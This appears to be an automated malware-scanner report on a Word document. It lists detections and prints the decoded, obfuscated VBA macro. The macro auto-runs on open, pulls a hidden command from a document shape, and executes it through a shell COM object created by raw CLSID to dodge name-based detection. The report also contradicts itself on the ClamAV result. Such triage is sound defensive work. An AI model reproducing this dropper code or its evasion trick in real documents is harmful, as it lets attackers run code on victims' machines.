Verdict: MALICIOUS
Risk Score: 252
Heuristics: 9

- ClamAV: Doc.Downloader.Sagent-6766662-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sagent-6766662-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script:
  Rbfjzt = 148575431 + CByte(LCaAUmR - Sqr(kjLVqK)) * VJUks - QdAzULiZ * ituAitYtE / CDate(320788491) * 77537730 * 137046410 / (204052125 - Sin(114799999)) Set ACEzt = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  Matched line in script:
  Rbfjzt = 148575431 + CByte(LCaAUmR - Sqr(kjLVqK)) * VJUks - QdAzULiZ * ituAitYtE / CDate(320788491) * 77537730 * 137046410 / (204052125 - Sin(114799999)) Set ACEzt = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script:
  Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7723 bytes |

SHA-256: d43e0ca3c54a60d1e3b01d5b2b171c8dae1a84b0c5d5b6d72d687a5318504da7

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 126 of 198 identifiers look randomly generated (e.g. 'OzzMZNcPLZwzNf'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "svpZkXZXjOE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case wzdGYfKF
Case 155587058
IYKYw = 220395863
wvizhSJ = zBanCvaJQ
JPnNjooC = 238242064
Case 47683123
RnOtjOL = ChrW(189237657)
PfTKYdjR = CDate(136122207)
hOtnn = 119754033
End Select
lPuIfhCT = 228252844 + CByte(LuThPh - Sqr(VdvcoCE)) * hfZOXzb - wdwijkz * qpPXXA / CDate(154153117) * 123497367 * 219220128 / (121026023 - Sin(119566006))
On Error Resume Next
Select Case ziWhdr
Case 148624673
ZInQuWXGh = 118036196
fXjFBz = qzUntuBo
whAoN = 127757053
Case 228103571
kGWBR = ChrW(93287111)
SWqzvQd = CDate(142279553)
tAWcmPsP = 34303629
End Select
ZYhdBM = 271053198 + CByte(UubjZlw - Sqr(WECtpU)) * QvMwFX - OHwBozk * onGrJbIJa / CDate(245228183) * 211095851 * 117779595 / (291993741 - Sin(264683097))
Set aEMQio = Shapes("OzzMZNcPLZwzNf")
On Error Resume Next
Select Case zCEJz
Case 142153657
ZDzMK = 104418824
PrQKBqU = jWrXPB
LzrMLMzSN = 287074758
Case 268437309
OTEcYSsI = ChrW(41279548)
Qrkoi = CDate(128325969)
SZGEdrzU = 330667746
End Select
ISYDS = 83473322 + CByte(GviuS - Sqr(WsqDj)) * bXddl - RikkbHHZN * qhFwijim / CDate(268777732) * 255251723 * 340609672 / (136958446 - Sin(231249629))
On Error Resume Next
Select Case vJiqdwi
Case 286878348
AoNDitXh = 200533646
pKiAO = nVacY
znTDOTw = 99754725
Case 271865117
pQBFjtW = ChrW(161872028)
lnzRTNJQq = CDate(279596759)
DPPcpZk = 175766376
End Select
DlPKQUR = 336435149 + CByte(RtzBm - Sqr(kzWAqEDG)) * MUaAYQJ - vtlAX * AwvKHYwd / CDate(12890685) * 187190081 * 187164846 / (293362790 - Sin(272983030))
IsVtSXRXS = "" + rIkDIAm + ZAiqwwu + WBuuv + aEMQio.TextFrame.TextRange.Text + TkVhq + jSzYjbG + ijPPM
On Error Resume Next
Select Case wqEWbfn
Case 99970305
jjiUMH = 108468624
zQJLIQF = daUDhLY
lzZKREmz = 325032573
Case 2611581
LalCO = ChrW(227118574)
TBfJpa = CDate(335116084)
wESLj = 163206837
End Select
qiNiFE = 292889944 + CByte(LOINuvr - Sqr(GUSrWIc)) * wLQGh - lQiAjCp * cLaYTvjM / CDate(31634011) * 32789272 * 45797279 / (221686702 - Sin(83719416))
On Error Resume Next
Select Case mwKPp
Case 298840705
ZznanvO = 225852114
mjLsudJic = BOoJvTh
fvohX = 48919911
Case 152513638
zvzBhY = ChrW(238466587)
qfjZFJpcn = CDate(128157851)
KkorHFvjm = 29562058
End Select
IEVji = 91671013 + CByte(bodisSQm - Sqr(uVGMu)) * PMdKD - vmpzrlWcE * fbqLfOj / CDate(286026817) * 146333745 * 178818278 / (137420973 - Sin(332138795))
On Error Resume Next
Select Case FLXAJNkZ
Case 133205822
iwFEaJu = 132530515
WXzltNs = riVfFPbUK
zmMEvU = 28483297
Case 300289336
WWjcvf = ChrW(240714020)
KFainRV = CDate(301690329)
wuZjdjPwu = 218363501
End Select
Rbfjzt = 148575431 + CByte(LCaAUmR - Sqr(kjLVqK)) * VJUks - QdAzULiZ * ituAitYtE / CDate(320788491) * 77537730 * 137046410 / (204052125 - Sin(114799999))
Set ACEzt = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case EwjSFbmvn
Case 231967922
XvARqP = 159591360
GMjGTbAkl = wEIrLpSf
POmruwjN = 296571163
Case 152663589
JOvaI = ChrW(230874787)
rMqErAK = CDate(272854877)
GfjKwKi = 58013341
End Select
UVlKnNHN = 245399292 + CByte(kIiicRa - Sqr(tKXljF)) * ZhJMBw - mpoNmhZd * dPjFVYwHs / CDate(161054375) * 287980980 * 242593197 / (328508124 - Sin(86265137))
On Error Resume Next
Select Case hwWcmq
Case 289532403
biJtPX = 332219800
MBAmIkjVc = jDqELwzO
aJWjhBRnr = 322865279
Case 296394707
nzYOtKME = ChrW(326233717)
AzBHod = CDate(150984202)
LtAfXmq = 139186049
End Select
lrwoYj = 1155137 + CByte(ESpSnnKvK - Sqr(WfZNn)) * UlzkIb - YXrbNAbb * BMjLhD / CDate(154014447) * 41324005 * 278532208 / (236280180 - Sin(84528513))
On Error Resume Next
Select Case fwTjTM
Case 287472304
wLvvjHVC = 216351508
opZEhU = RrpvvV
JGzJiFJt = 222411550
Case 168013946
AADwXmCTQ = ChrW(90711313)
nbQzU = CDate(13210872)
CkAqNla = 67127566
End Select
XbGuHA = 78923790 + CByte(TMUTCtcF - Sqr(GTVsfk)) * YfprJ - RVNairKT * nPjfIhBzq / CDate(158576435) * 248003720 * 298057491 / (204896264 - Sin(46667630))
On Error Resume Next
Select Case XCWcfncQ
Case 208046481
ajQLQBGc = 142953631
wiMaD = ahwwvJBGE
cwlATF = 211530596
Case 240512072
vMPioi = ChrW(27248232)
njtpwYjN = CDate(308743129)
jlQhKH = 14754020
End Select
IrUotwc = 39608761 + CByte(jKwHQ - Sqr(UOZLYfZCn)) * lzzDNBI - OaNUwnvN * RzCwMQtwT / CDate(242706345) * 317801981 * 194433011 / (303403114 - Sin(234036687))
Const nAtHMsLFml = 0
On Error Resume Next
Select Case dwOMjtawD
Case 161244163
VNOYNMzIm = 164853968
sZsoYwS = nzAjl
pVSJjY = 27162451
Case 107675876
QLrFDwdk = ChrW(49188924)
AEoUrV = CDate(187152123)
vlrUidN = 156056908
End Select
fzCAYbjbc = 216104336 + CByte(OLJOtSkGA - Sqr(aoHtI)) * zwjNrjF - lEQcdEsOo * QjbdbMsH / CDate(151894862) * 273581043 * 35776897 / (71116231 - Sin(310567453))
ACEzt.Run@ IsVtSXRXS, nAtHMsLFml
On Error Resume Next
Select Case JBncD
Case 244539726
GNujwG = 60624321
Ujckoj = zjTBtNM
RXpRkvtq = 182314709
Case 120675448
DjiHl = ChrW(234713864)
doqRROY = CDate(257401563)
EJBrC = 304158111
End Select
cMHoYVap = 8384846 + CByte(kdnVbh - Sqr(VjXpAG)) * tzuphZa - JBBvi * wHOAPzivz / CDate(210520988) * 192551266 * 182281596 / (233942471 - Sin(144451092))
On Error Resume Next
Select Case MzXMwq
Case 83668135
szkzi = 89540379
Dkmzhcu = GYAvhwvwA
iBOhiFs = 170681730
Case 36476240
pMBsSDoD = ChrW(140214745)
tmRHRnwuf = CDate(48753070)
BkavLLVGh = 48559240
End Select
WNAtX = 49592970 + CByte(dHrcEdw - Sqr(GQqHwuwk)) * cazGsTzo - lPDHXQrR * zEZfz / CDate(337522053) * 178643632 * 29669833 / (35760976 - Sin(106743678))
On Error Resume Next
Select Case tKXcqtRJ
Case 184952118
QZqTBituz = 191816364
tiowvnTiK = GhiwPmjX
AEqXTInv = 339217481
Case 55425810
pjwmAj = ChrW(234250165)
uFwbRNJr = CDate(48330789)
lsMXKcq = 19551601
End Select
UoIrT = 170312042 + CByte(uZjwzjCAc - Sqr(CcYKJQja)) * PERWVv - aOsmNiBXS * IKXCpLvc / CDate(167497861) * 93869361 * 198444645 / (312669545 - Sin(73694012))
End Sub